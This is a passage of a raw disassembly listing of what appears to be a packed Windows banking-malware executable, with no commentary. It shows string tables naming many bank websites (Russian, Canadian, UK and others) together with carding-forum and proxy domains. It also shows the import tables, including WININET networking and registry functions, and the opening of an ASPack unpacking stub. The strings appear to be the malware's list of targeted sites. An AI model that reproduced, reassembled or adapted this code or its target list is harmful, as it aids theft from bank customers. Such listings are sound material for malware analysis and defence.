aDigitalRelaxkg db 'digital-relaxkgb.ru',0 ; DATA XREF: .data:0043C13C�o
aAsmworm_com db 'asmworm.com',0 ; DATA XREF: .data:0043C134�o
aAtmacasoft_com db 'atmacasoft.com',0 ; DATA XREF: .data:0043C130�o
aCrutop_nuVbu_1 db 'crutop.nu/vbulletin/showthread.php',0 ; DATA XREF: .data:0043C12C�o
aWww_uniastrum_ db 'www.uniastrum.ru',0 ; DATA XREF: .data:0043C128�o
aCrutop_nuVbu_0 db 'crutop.nu/vbulletin/forumdisplay.php',0 ; DATA XREF: .data:0043C124�o
aWww_mmbank_ru db 'www.mmbank.ru',0 ; DATA XREF: .data:0043C120�o
aCrutop_nuVbull db 'crutop.nu/vbulletin/',0 ; DATA XREF: .data:0043C11C�o
aAlfabank_ru db 'alfabank.ru',0 ; DATA XREF: .data:0043C118�o
aHyperSpaceFuel db 'hyper-space-fuel.ru',0 ; DATA XREF: .data:0043C114�o
aWww_cwbank_com db 'www.cwbank.com',0 ; DATA XREF: .data:0043C110�o
aWww_vtb_ru db 'www.vtb.ru',0 ; DATA XREF: .data:0043C10C�o
aWww_cibc_com db 'www.cibc.com',0 ; DATA XREF: .data:0043C108�o
aWww_bankofmadu db 'www.bankofmadura.com',0 ; DATA XREF: .data:0043C104�o
aWww_bmo_com db 'www.bmo.com',0 ; DATA XREF: .data:0043C100�o
aWww_bankBanque db 'www.bank-banque-canada.ca/index.php',0 ; DATA XREF: .data:0043C0FC�o
aWww_masterbank db 'www.masterbank.ru',0 ; DATA XREF: .data:0043C0F8�o
aEbookfinaltras db 'ebookfinaltrash.ru',0 ; DATA XREF: .data:0043C0F4�o
aMasterX_com db 'master-x.com',0 ; DATA XREF: .data:0043C0F0�o
aWww_bbin_ru db 'www.bbin.ru',0 ; DATA XREF: .data:0043C0EC�o
aOlb2_nationet_ db 'olb2.nationet.com',0 ; DATA XREF: .data:0043C0E8�o
aWelcome3_smile db 'welcome3.smile.co.uk',0 ; DATA XREF: .data:0043C0E4�o
aWww_baltbank_r db 'www.baltbank.ru',0 ; DATA XREF: .data:0043C0E0�o
aNew_egg_com db 'new.egg.com',0 ; DATA XREF: .data:0043C0DC�o
aProdexteam_n_1 db 'prodexteam.netcrutop.nu',0 ; DATA XREF: .data:0043C0D8�o
aWww_proxySocks db 'www.proxy-socks.net',0 ; DATA XREF: .data:0043C0D4�o
; .data:0043C138�o
aWww_cbr_ru db 'www.cbr.ru',0 ; DATA XREF: .data:0043C0D0�o
aProdexteam_n_0 db 'prodexteam.net/main.htm',0 ; DATA XREF: .data:0043C0CC�o
aProdexteam_net db 'prodexteam.net',0 ; DATA XREF: .data:0043C0C8�o
aChechenpress_i db 'chechenpress.info',0 ; DATA XREF: .data:0043C0C4�o
aSiliconfirewar db 'siliconfireware.ru',0 ; DATA XREF: .data:off_43C0C0�o
db '://',0
align 4
dword_447B0C dd 332C4425h, 11D026CBh, 0C00083B4h, 1901D94Fh ; DATA XREF: sub_406EA8+D9�o
dword_447B1C dd 3050F1FFh, 11CF98B5h, 0AA0082BBh, 0BCEBD00h ; DATA XREF: sub_406EA8+46A�o
; sub_406EA8+8D9�o
dword_447B2C dd 3050F1F7h, 11CF98B5h, 0AA0082BBh, 0BCEBD00h ; DATA XREF: sub_406EA8+803�o
dword_447B3C dd 332C4427h, 11D026CBh, 0C00083B4h, 1901D94Fh ; DATA XREF: sub_406EA8+2E3�o
dword_447B4C dd 85CB6900h, 11CF4D95h, 80000C96h, 85EEF4C7h ; DATA XREF: sub_406A6B+A3�o
dword_447B5C dd 2 dup(0) ; DATA XREF: sub_406A6B+6B�o
dd 0C0h, 46000000h
dword_447B6C dd 0D30C1661h, 11D0CDAFh, 0C0003E8Ah, 6EE2C94Fh ; DATA XREF: sub_406B58+1E8�o
dword_447B7C dd 10h dup(0) ; DATA XREF: sub_40BEE0�o
; sub_40BEE0:loc_40BEFA�o ...
dword_447BBC dd 0 ; DATA XREF: sub_40BE84+16�o
; sub_40BE84:loc_40BEC6�o ...
dd 0Fh dup(0)
dword_447BFC dd 0 ; DATA XREF: sub_40BFE9+C�w
; sub_40BFE9+825�r
dword_447C00 dd 0 ; DATA XREF: sub_40BFE9+14�w
; sub_40BFE9+82C�r
dword_447C04 dd 0 ; DATA XREF: sub_40BFE9+1C�w
; sub_40BFE9+834�r
dword_447C08 dd 0 ; DATA XREF: sub_40BFE9+24�w
; sub_40BFE9+83C�r
align 400h
_data ends
; Section 4. (virtual address 00048000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 00048000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata segment para public 'DATA' use32
assume cs:_idata
;org 448000h
off_448000 dd offset dword_44810C ; DATA XREF: .idata:00448E00�o
dd 2 dup(0)
dd offset dword_44810C
dd offset dword_44810C
off_448014 dd offset dword_44811C ; DATA XREF: .idata:00448E10�o
; .idata:00448E14�o
align 10h
dd offset dword_44811C
dd offset dword_44811C
off_448028 dd offset dword_448134 ; DATA XREF: .idata:00448E24�o
; .idata:00448E28�o ...
dd 2 dup(0)
dd offset dword_448134
dd offset dword_448134
off_44803C dd offset dword_448214 ; DATA XREF: .idata:00448E44�o
; .idata:00448E48�o ...
dd 2 dup(0)
dd offset dword_448214
dd offset dword_448214
off_448050 dd offset dword_448290 ; DATA XREF: .idata:00448F28�o
; .idata:00448F2C�o ...
dd 2 dup(0)
dd offset dword_448290
dd offset dword_448290
off_448064 dd offset dword_4482AC ; DATA XREF: .idata:00448FA8�o
; .idata:00448FAC�o ...
align 10h
dd offset dword_4482AC
dd offset dword_4482AC
off_448078 dd offset dword_4482E8 ; DATA XREF: .idata:00448FCC�o
; .idata:00448FD0�o ...
dd 2 dup(0)
dd offset dword_4482E8
dd offset dword_4482E8
off_44808C dd offset dword_448338 ; DATA XREF: .idata:0044900C�o
; .idata:00449010�o ...
dd 2 dup(0)
dd offset dword_448338
dd offset dword_448338
dd 1Ah dup(0)
dd 48574h
dword_44810C dd 2 dup(0) ; DATA XREF: .idata:off_448000�o
; .idata:0044800C�o ...
dd 48588h, 485A4h
dword_44811C dd 2 dup(0) ; DATA XREF: .idata:off_448014�o
; .idata:00448020�o ...
dd 485C0h, 485D4h, 485E8h, 485F8h
dword_448134 dd 2 dup(0) ; DATA XREF: .idata:off_448028�o
; .idata:00448034�o ...
dd 4860Ch, 4861Ch, 4862Ch, 48648h, 4865Ch, 48674h, 4868Ch
dd 4869Ch, 486ACh, 486BCh, 486D4h, 486E8h, 486FCh, 48710h
dd 48728h, 48738h, 48748h, 48758h, 48768h, 48778h, 48790h
dd 487A8h, 487BCh, 487D0h, 487E4h, 487FCh, 48814h, 48824h
dd 48834h, 48848h, 48858h, 48864h, 48874h, 48880h, 48890h
dd 488A0h, 488ACh, 488B8h, 488C8h, 488D8h, 488ECh, 488FCh
dd 48904h, 48918h, 48928h, 48938h, 48948h, 48960h, 4896Ch
dd 48978h, 48988h, 48994h, 489A0h, 489B4h
dword_448214 dd 2 dup(0) ; DATA XREF: .idata:off_44803C�o
; .idata:00448048�o ...
dd 489C4h, 489D8h, 489ECh, 489FCh, 48A0Ch, 48A18h, 48A28h
dd 48A34h, 48A4Ch, 48A5Ch, 48A68h, 48A74h, 48A84h, 48A94h
dd 48AA8h, 48ABCh, 48AD0h, 48AE4h, 48AF8h, 48B0Ch, 48B20h
dd 48B2Ch, 48B3Ch, 48B50h, 48B64h, 48B74h, 48B88h, 48B98h
dd 48BA8h
dword_448290 dd 2 dup(0) ; DATA XREF: .idata:off_448050�o
; .idata:0044805C�o ...
dd 48BBCh, 48BD0h, 48BE0h, 48BF0h, 48C08h
dword_4482AC dd 2 dup(0) ; DATA XREF: .idata:off_448064�o
; .idata:00448070�o ...
dd 48C18h, 48C2Ch, 48C44h, 48C58h, 48C68h, 48C78h, 48C8Ch
dd 48CA0h, 48CB4h, 48CC8h, 48CDCh, 48CF8h, 48D10h
dword_4482E8 dd 2 dup(0) ; DATA XREF: .idata:off_448078�o
; .idata:00448084�o ...
dd 48D2Ch, 48D34h, 48D44h, 48D50h, 48D5Ch, 48D64h, 48D6Ch
dd 48D78h, 48D84h, 48D90h, 48D98h, 48DA0h, 48DACh, 48DB8h
dd 48DC0h, 48DCCh, 48DD8h, 48DE4h
dword_448338 dd 2 dup(0) ; DATA XREF: .idata:off_44808C�o
; .idata:00448098�o ...
dword_448340 dd 77121680h ; DATA XREF: sub_40BE30�r
dd 2 dup(0)
dword_44834C dd 7620FB39h ; DATA XREF: sub_40BE3C�r
dword_448350 dd 76220FB4h ; DATA XREF: sub_40BE48�r
dd 2 dup(0)
dword_44835C dd 771C1E56h ; DATA XREF: sub_40BE54�r
dword_448360 dd 771C69DCh ; DATA XREF: sub_40BE60�r
dword_448364 dd 771C6F69h ; DATA XREF: sub_40BE6C�r
dword_448368 dd 771C16BAh ; DATA XREF: sub_40BE78�r
dd 2 dup(0)
dword_448374 dd 77E73628h ; DATA XREF: sub_40C908�r
dword_448378 dd 77E75CB5h ; DATA XREF: sub_40C914�r
dword_44837C dd 77E668D9h ; DATA XREF: sub_40C920�r
dword_448380 dd 77E7C938h ; DATA XREF: sub_40C92C�r
dword_448384 dd 77E80656h ; DATA XREF: sub_40C938�r
dword_448388 dd 77E77CC4h ; DATA XREF: sub_40C944�r
dword_44838C dd 77E793EFh ; DATA XREF: sub_40C950�r
dword_448390 dd 77E73CE2h ; DATA XREF: sub_40C95C�r
dword_448394 dd 77F5157Dh ; DATA XREF: sub_40C968�r
dword_448398 dd 77E7A099h ; DATA XREF: sub_40C974�r
dword_44839C dd 77E79F93h ; DATA XREF: sub_40C980�r
dword_4483A0 dd 77E7A5FDh ; DATA XREF: sub_40C98C�r
dword_4483A4 dd 77E77CB7h ; DATA XREF: sub_40C998�r
dword_4483A8 dd 77E704FCh ; DATA XREF: sub_40C9A4�r
dword_4483AC dd 77E77963h ; DATA XREF: sub_40C9B0�r
dword_4483B0 dd 77E6AD34h ; DATA XREF: sub_40C9BC�r
dword_4483B4 dd 77E7751Ah ; DATA XREF: sub_40C9C8�r
dword_4483B8 dd 77E7C486h ; DATA XREF: sub_40C9D4�r
dword_4483BC dd 77E7C657h ; DATA XREF: sub_40C9E0�r
dword_4483C0 dd 77E681EFh ; DATA XREF: sub_40C9EC�r
dword_4483C4 dd 77E705B0h ; DATA XREF: sub_40C9F8�r
dword_4483C8 dd 77E6C674h ; DATA XREF: sub_40CA04�r
dword_4483CC dd 77E6D28Ch ; DATA XREF: sub_40CA10�r
dword_4483D0 dd 77E6D229h ; DATA XREF: sub_40CA1C�r
dword_4483D4 dd 77E76C1Ah ; DATA XREF: sub_40CA28�r
dword_4483D8 dd 77E777EFh ; DATA XREF: sub_40CA34�r
dword_4483DC dd 77E7339Ch ; DATA XREF: sub_40CA40�r
dword_4483E0 dd 77E73196h ; DATA XREF: sub_40CA4C�r
dword_4483E4 dd 77E72E92h ; DATA XREF: sub_40CA58�r
dword_4483E8 dd 77E805D8h ; DATA XREF: sub_40CA64�r
dword_4483EC dd 77E6BD13h ; DATA XREF: sub_40CA70�r
dword_4483F0 dd 77E79881h ; DATA XREF: sub_40CA7C�r
dword_4483F4 dd 77E79A45h ; DATA XREF: sub_40CA88�r
dword_4483F8 dd 77E8074Ah ; DATA XREF: sub_40CA94�r
dword_4483FC dd 77E706B7h ; DATA XREF: sub_40CAA0�r
dword_448400 dd 77E78B82h ; DATA XREF: sub_40CAAC�r
dword_448404 dd 77F6183Eh ; DATA XREF: sub_40CAB8�r
dword_448408 dd 77F82D5Ch ; DATA XREF: sub_40CAC4�r
dword_44840C dd 77E7A837h ; DATA XREF: sub_40CAD0�r
dword_448410 dd 77E78C81h ; DATA XREF: sub_40CADC�r
dword_448414 dd 77E7011Ah ; DATA XREF: sub_40CAE8�r
dword_448418 dd 77E61BE6h ; DATA XREF: sub_40CAF4�r
dword_44841C dd 77E616B4h ; DATA XREF: sub_40CB00�r
dword_448420 dd 77E7980Ah ; DATA XREF: sub_40CB0C�r
dword_448424 dd 77E79E34h ; DATA XREF: sub_40CB18�r
dword_448428 dd 77E7F044h ; DATA XREF: sub_40CB24�r
dword_44842C dd 77E79924h ; DATA XREF: sub_40CB30�r
dword_448430 dd 77E684C6h ; DATA XREF: sub_40CB3C�r
dword_448434 dd 77E79D8Ch ; DATA XREF: sub_40CB48�r
dword_448438 dd 77E7C2C4h ; DATA XREF: sub_40CB54�r
dword_44843C dd 77E74672h ; DATA XREF: sub_40CB60�r
dword_448440 dd 77E77EF1h ; DATA XREF: sub_40CB6C�r
dword_448444 dd 77E61BB8h ; DATA XREF: sub_40CB78�r
dword_448448 dd 77E7AC37h ; DATA XREF: sub_40CB84�r
dd 2 dup(0)
dword_448454 dd 77D5BA26h ; DATA XREF: sub_40CB90�r
dword_448458 dd 77D5C13Ah ; DATA XREF: sub_40CB9C�r
dword_44845C dd 77D45F74h ; DATA XREF: sub_40CBA8�r
dword_448460 dd 77D4BDCAh ; DATA XREF: sub_40CBB4�r
dword_448464 dd 77D46254h ; DATA XREF: sub_40CBC0�r
dword_448468 dd 77D5C2CCh ; DATA XREF: sub_40CBCC�r
dword_44846C dd 77D48137h ; DATA XREF: sub_40CBD8�r
dword_448470 dd 77D4456Bh ; DATA XREF: sub_40CBE4�r
dword_448474 dd 77D47EE5h ; DATA XREF: sub_40CBF0�r
dword_448478 dd 77D444F0h ; DATA XREF: sub_40CBFC�r
dword_44847C dd 77D4A102h ; DATA XREF: sub_40CC08�r
dword_448480 dd 77D6ADD7h ; DATA XREF: sub_40CC14�r
dword_448484 dd 77D44200h ; DATA XREF: sub_40CC20�r
dword_448488 dd 77D43FEDh ; DATA XREF: sub_40CC2C�r
dword_44848C dd 77D49951h ; DATA XREF: sub_40CC38�r
dword_448490 dd 77D8E10Eh ; DATA XREF: sub_40CC44�r
dword_448494 dd 77D52990h ; DATA XREF: sub_40CC50�r
dword_448498 dd 77D44A45h ; DATA XREF: sub_40CC5C�r
dword_44849C dd 77D43DD3h ; DATA XREF: sub_40CC68�r
dword_4484A0 dd 77D441F2h ; DATA XREF: sub_40CC74�r
dword_4484A4 dd 77D4C96Ah ; DATA XREF: sub_40CC80�r
dword_4484A8 dd 77D4702Fh ; DATA XREF: sub_40CC8C�r
dword_4484AC dd 77D4DC11h ; DATA XREF: sub_40CC98�r
dword_4484B0 dd 77D4B816h ; DATA XREF: sub_40CCA4�r
dword_4484B4 dd 77D47D27h ; DATA XREF: sub_40CCB0�r
dword_4484B8 dd 77D414D4h ; DATA XREF: sub_40CCBC�r
dword_4484BC dd 77D49A11h ; DATA XREF: sub_40CCC8�r
dword_4484C0 dd 77D47EC7h ; DATA XREF: sub_40CCD4�r
dword_4484C4 dd 77D46F5Bh ; DATA XREF: sub_40CCE0�r
align 10h
dword_4484D0 dd 77C724ACh ; DATA XREF: sub_40CCEC�r
dword_4484D4 dd 77C71E2Eh ; DATA XREF: sub_40CCF8�r
dword_4484D8 dd 77C71D83h ; DATA XREF: sub_40CD04�r
dword_4484DC dd 77C7E6D9h ; DATA XREF: sub_40CD10�r
dword_4484E0 dd 77C7F85Ah ; DATA XREF: sub_40CD1C�r
dd 2 dup(0)
dword_4484EC dd 77DD5D20h ; DATA XREF: sub_40CD28�r
dword_4484F0 dd 77DD5D40h ; DATA XREF: sub_40CD34�r
dword_4484F4 dd 77DD590Bh ; DATA XREF: sub_40CD40�r
dword_4484F8 dd 77DD189Ah ; DATA XREF: sub_40CD4C�r
dword_4484FC dd 77DD22EAh ; DATA XREF: sub_40CD58�r
dword_448500 dd 77DD23D7h ; DATA XREF: sub_40CD64�r
dword_448504 dd 77DD59F0h ; DATA XREF: sub_40CD70�r
dword_448508 dd 77DE2934h ; DATA XREF: sub_40CD7C�r
dword_44850C dd 77DE27A1h ; DATA XREF: sub_40CD88�r
dword_448510 dd 77DE2B37h ; DATA XREF: sub_40CD94�r
dword_448514 dd 77DD8664h ; DATA XREF: sub_40CDA0�r
dword_448518 dd 77DD8619h ; DATA XREF: sub_40CDAC�r
dword_44851C dd 77DD8656h ; DATA XREF: sub_40CDB8�r
dd 2 dup(0)
dword_448528 dd 73D96FEBh ; DATA XREF: sub_40CDC4�r
dword_44852C dd 73D91C28h ; DATA XREF: sub_40CDD0�r
dword_448530 dd 73D92B86h ; DATA XREF: sub_40CDDC�r
dword_448534 dd 73D9A3B0h ; DATA XREF: sub_40CDE8�r
dword_448538 dd 73D9B9A2h ; DATA XREF: sub_40CDF4�r
dword_44853C dd 73D91F60h ; DATA XREF: sub_40CE00�r
dword_448540 dd 73D9D320h ; DATA XREF: sub_40CE0C�r
dword_448544 dd 73D9D340h ; DATA XREF: sub_40CE18�r
dword_448548 dd 73D9D5E0h ; DATA XREF: sub_40CE24�r
dword_44854C dd 73D9242Ch ; DATA XREF: sub_40CE30�r
dword_448550 dd 73D9DBAFh ; DATA XREF: sub_40CE3C�r
dword_448554 dd 73D92226h ; DATA XREF: sub_40CE48�r
dword_448558 dd 73D9E5C5h ; DATA XREF: sub_40CE54�r
dword_44855C dd 73D9DBA2h ; DATA XREF: sub_40CE60�r
dword_448560 dd 73D9E61Eh ; DATA XREF: sub_40CE6C�r
dword_448564 dd 73D9E65Ch ; DATA XREF: sub_40CE78�r
dword_448568 dd 73D9E69Ch ; DATA XREF: sub_40CE84�r
dword_44856C dd 73D9F24Ch ; DATA XREF: sub_40CE90�r
dd 0
dd 79530046h, 6C6C4173h, 7453636Fh, 676E6972h, 0
dd 69460015h, 6946646Eh, 55747372h, 61436C72h, 45656863h
dd 7972746Eh, 41h, 6946001Ch, 654E646Eh, 72557478h, 6361436Ch
dd 6E456568h, 41797274h, 0
dd 6F43006Ah, 61657243h, 6E496574h, 6E617473h, 6563h, 4C43007Ch
dd 46444953h, 536D6F72h, 6E697274h, 67h, 6F430058h, 74696E49h
dd 696C6169h, 657Ah, 6F43005Bh, 6E696E55h, 61697469h, 657A696Ch
dd 0
dd 6544006Bh, 6574656Ch, 656C6946h, 41h, 7845009Bh, 72507469h
dd 7365636Fh, 73h, 7845009Dh, 646E6170h, 69766E45h, 6D6E6F72h
dd 53746E65h, 6E697274h, 417367h, 654700EDh, 6D6F4374h
dd 646E616Dh, 656E694Ch, 41h, 65470112h, 72754374h, 746E6572h
dd 636F7250h, 49737365h, 64h, 65470115h, 72754374h, 746E6572h
dd 65726854h, 64496461h, 0
dd 6547012Fh, 6C694674h, 7A695365h, 65h, 65470131h, 6C694674h
dd 6D695465h, 65h, 6547013Ch, 73614C74h, 72724574h, 726Fh
dd 65470147h, 646F4D74h, 46656C75h, 4E656C69h, 41656D61h
dd 0
dd 65470149h, 646F4D74h, 48656C75h, 6C646E61h, 4165h, 65470167h
dd 6F725074h, 64644163h, 73736572h, 0
dd 6547016Ah, 6F725074h, 73736563h, 70616548h, 0
dd 65470188h, 73795374h, 446D6574h, 63657269h, 79726F74h
dd 41h, 6C430027h, 4865736Fh, 6C646E61h, 65h, 6547019Ah
dd 6D655474h, 74615070h, 4168h, 654701A4h, 63695474h, 756F436Bh
dd 746Eh, 654701ACh, 72655674h, 6E6F6973h, 0
dd 654701ADh, 72655674h, 6E6F6973h, 417845h, 654701AFh
dd 6C6F5674h, 49656D75h, 726F666Eh, 6974616Dh, 416E6Fh
dd 654701B7h, 6E695774h, 73776F64h, 65726944h, 726F7463h
dd 4179h, 6C4701BAh, 6C61626Fh, 41646441h, 416D6F74h, 0
dd 6C4701BEh, 6C61626Fh, 656C6544h, 74416574h, 6D6Fh, 6C4701BFh
dd 6C61626Fh, 646E6946h, 6D6F7441h, 41h, 6C4701C8h, 6C61626Fh
dd 6F6D654Dh, 74537972h, 73757461h, 0
dd 6E4901EBh, 6C726574h, 656B636Fh, 636E4964h, 656D6572h
dd 746Eh, 734901F1h, 52646142h, 50646165h, 7274h, 734901F4h
dd 57646142h, 65746972h, 727450h, 734901F7h, 75626544h
dd 72656767h, 73657250h, 746E65h, 6F4C0203h, 694C6461h
dd 72617262h, 4179h, 6F430033h, 69467970h, 41656Ch, 6F4C0209h
dd 416C6163h, 636F6C6Ch, 0
dd 6F4C020Dh, 466C6163h, 656572h, 704F0230h, 754D6E65h
dd 41786574h, 0
dd 704F0232h, 72506E65h, 7365636Fh, 73h, 6552025Ch, 69466461h
dd 656Ch, 74520278h, 776E556Ch, 646E69h, 74520279h, 72655A6Ch
dd 6D654D6Fh, 79726Fh, 72430042h, 65746165h, 656C6946h
dd 41h, 655302A8h, 6C694674h, 696F5065h, 7265746Eh, 0
dd 655302ACh, 6C694674h, 6D695465h, 65h, 6C5302DCh, 706565h
dd 655402E4h, 6E696D72h, 50657461h, 65636F72h, 7373h, 695602FEh
dd 61757472h, 6C6C416Ch, 636Fh, 69560300h, 61757472h, 6572466Ch
dd 65h, 69560305h, 61757472h, 6575516Ch, 7972h, 69570311h
dd 68436564h, 6F547261h, 746C754Dh, 74794269h, 65h, 69570312h
dd 6578456Eh, 63h, 7257031Dh, 46657469h, 656C69h, 7243004Fh
dd 65746165h, 6574754Dh, 4178h, 736C0345h, 656C7274h, 416Eh
dd 736C0346h, 656C7274h, 576Eh, 72430054h, 65746165h, 636F7250h
dd 41737365h, 0
dd 7243005Ah, 65746165h, 65726854h, 6461h, 61430063h, 69576C6Ch
dd 776F646Eh, 636F7250h, 41h, 6547006Ch, 6E695774h, 54776F64h
dd 41747865h, 0
dd 65470073h, 6E695774h, 52776F64h, 746365h, 69460078h
dd 6957646Eh, 776F646Eh, 41h, 6547007Ch, 6E695774h, 776F64h
dd 65470011h, 616C4374h, 614E7373h, 41656Dh, 655300CFh
dd 636F4674h, 7375h, 654700D4h, 726F4674h, 6F726765h, 57646E75h
dd 6F646E69h, 77h, 6F4C0019h, 75436461h, 726F7372h, 41h
dd 6553010Ah, 6D695474h, 7265h, 6F4C001Bh, 63496461h, 416E6Fh
dd 654D0140h, 67617373h, 786F4265h, 41h, 65470023h, 73654D74h
dd 65676173h, 41h, 65470169h, 6E695774h, 4C776F64h, 41676E6Fh
dd 0
dd 6553016Bh, 6E695774h, 4C776F64h, 41676E6Fh, 0
dd 7243016Eh, 65746165h, 6B736544h, 41706F74h, 0
dd 65530175h, 72685474h, 44646165h, 746B7365h, 706Fh, 65470176h
dd 72685474h, 44646165h, 746B7365h, 706Fh, 72540027h, 6C736E61h
dd 4D657461h, 61737365h, 6567h, 69440028h, 74617073h, 654D6863h
dd 67617373h, 4165h, 737701FBh, 6E697270h, 416674h, 65530034h
dd 654D646Eh, 67617373h, 4165h, 65520005h, 74736967h, 6C437265h
dd 41737361h, 0
dd 6F500041h, 75517473h, 654D7469h, 67617373h, 65h, 6853004Fh
dd 6957776Fh, 776F646Eh, 0
dd 72430053h, 65746165h, 646E6957h, 7845776Fh, 41h, 65440055h
dd 6F727473h, 6E695779h, 776F64h, 6F4D005Ah, 69576576h
dd 776F646Eh, 0
dd 65440061h, 6E695766h, 50776F64h, 41636F72h, 0
dd 65470089h, 6F745374h, 624F6B63h, 7463656Ah, 0
dd 655300CAh, 436B4274h, 726F6C6Fh, 0
dd 655300DDh, 78655474h, 6C6F4374h, 726Fh, 724300FAh, 65746165h
dd 73757242h, 646E4968h, 63657269h, 74h, 7243001Ch, 65746165h
dd 746E6F46h, 41h, 704F0018h, 72506E65h, 7365636Fh, 6B6F5473h
dd 6E65h, 6547001Ah, 6B6F5474h, 6E496E65h, 6D726F66h, 6F697461h
dd 6Eh, 65520173h, 65724367h, 4B657461h, 78457965h, 41h
dd 65520176h, 6F6C4367h, 654B6573h, 79h, 6552017Bh, 65704F67h
dd 79654B6Eh, 417845h, 65520186h, 65755167h, 61567972h
dd 4565756Ch, 4178h, 65520192h, 74655367h, 756C6156h, 41784565h
dd 0
dd 654701CCh, 63655374h, 74697275h, 666E4979h, 6Fh, 655301CFh
dd 63655374h, 74697275h, 666E4979h, 6Fh, 655301D6h, 746E4574h
dd 73656972h, 63416E49h, 416Ch, 6547004Ah, 64695374h, 6E656449h
dd 69666974h, 75417265h, 726F6874h, 797469h, 6547004Bh
dd 64695374h, 41627553h, 6F687475h, 79746972h, 0
dd 6547004Ch, 64695374h, 41627553h, 6F687475h, 79746972h
dd 6E756F43h, 74h, 695F00E8h, 616F74h, 5F5F0018h, 4D746547h
dd 416E6961h, 736772h, 735F0181h, 7065656Ch, 0
dd 735F01A6h, 63697274h, 706Dh, 626101F6h, 73h, 7865020Ah
dd 7469h, 656D0253h, 706D636Dh, 0
dd 656D0254h, 7970636Dh, 0
dd 656D0256h, 7465736Dh, 0
dd 61720260h, 657369h, 61720261h, 646Eh, 6973026Ah, 6C616E67h
dd 0
dd 7073026Dh, 746E6972h, 66h, 7273026Fh, 646E61h, 73730270h
dd 666E6163h, 0
dd 74730271h, 74616372h, 0
dd 74730272h, 72686372h, 0
dd 7473027Bh, 6D636E72h, 70h, 41454C4Fh, 32335455h, 4C4C442Eh
dd 0
dd offset off_448000
aWininet_dll db 'WININET.DLL',0
dd offset off_448014
dd offset off_448014
aOle32_dll db 'ole32.DLL',0
align 4
dd offset off_448028
dd offset off_448028
dd offset off_448028
dd offset off_448028
aKernel32_dll_1 db 'KERNEL32.dll',0
align 4
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
aUser32_dll_0 db 'USER32.DLL',0
align 4
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
aGdi32_dll db 'GDI32.DLL',0
align 4
dd offset off_448064
dd offset off_448064
dd offset off_448064
dd offset off_448064
dd offset off_448064
aAdvapi32_dll_0 db 'ADVAPI32.DLL',0
align 4
dd offset off_448078
dd offset off_448078
dd offset off_448078
dd offset off_448078
dd offset off_448078
dd offset off_448078
dd offset off_448078
dd offset off_448078
dd offset off_448078
dd offset off_448078
dd offset off_448078
dd offset off_448078
dd offset off_448078
aCrtdll_dll db 'CRTDLL.DLL',0
align 4
dd offset off_44808C
dd offset off_44808C
dd offset off_44808C
dd offset off_44808C
dd offset off_44808C
dd offset off_44808C
dd offset off_44808C
dd offset off_44808C
dd offset off_44808C
dd offset off_44808C
dd offset off_44808C
dd offset off_44808C
dd offset off_44808C
dd offset off_44808C
dd offset off_44808C
dd offset off_44808C
dd offset off_44808C
dd offset off_44808C
align 1000h
_idata ends
; Section 5. (virtual address 0004A000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 0004A000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_aspack segment para public 'DATA' use32
assume cs:_aspack
;org 44A000h
db 90h
; =============== S U B R O U T I N E =======================================
public start
start proc near
pusha
call sub_44A577
jmp short loc_44A055
; ---------------------------------------------------------------------------
align 4
dd 0D9000000h, 4873h, 90DB8700h, 6 dup(0)
dd 4A00001h, 38000000h, 36000000h, 0E7980A00h, 0E79E3477h
dd 77h, 3 dup(0)
db 0
; ---------------------------------------------------------------------------
loc_44A055: ; CODE XREF: start+6�j
mov ebx, offset dword_4439A4
add ebx, ebp
sub ebx, ss:dword_4439D5[ebp]
cmp ss:dword_444804[ebp], 0
mov ss:dword_444804[ebp], ebx
jnz loc_44A4DB
lea eax, dword_44480C[ebp]
push eax
call ss:dword_444918[ebp]
mov ss:dword_444808[ebp], eax
mov edi, eax
lea ebx, dword_444819[ebp]
push ebx
push eax
call ss:dword_444914[ebp]
mov ss:dword_4439E1[ebp], eax
lea ebx, dword_444826[ebp]
push ebx
push edi
call ss:dword_444914[ebp]
mov ss:dword_4439E5[ebp], eax
lea eax, dword_443B72[ebp]
jmp eax
; ---------------------------------------------------------------------------
align 10h
dd 40h, 2 dup(0)
dd 80000000h, 12190004h, 2 dup(0)
dd 10000000h, 0BE9C0000h, 0C0000000h, 0BC0C0003h, 80000000h
dd 10540004h, 36h dup(0)
dd 9D8B0000h, 443A66h, 0A74DB0Bh, 8587038Bh, 443A6Ah, 0B58D0389h
dd 443A82h, 0F003E83h, 11D84h, 82B58D00h, 6A00443Ah, 10006804h
dd 680000h, 6A000018h, 0E195FF00h, 89004439h, 4439DD85h
dd 4468B00h, 10E05h, 68046A00h, 1000h, 0FF006A50h, 4439E195h
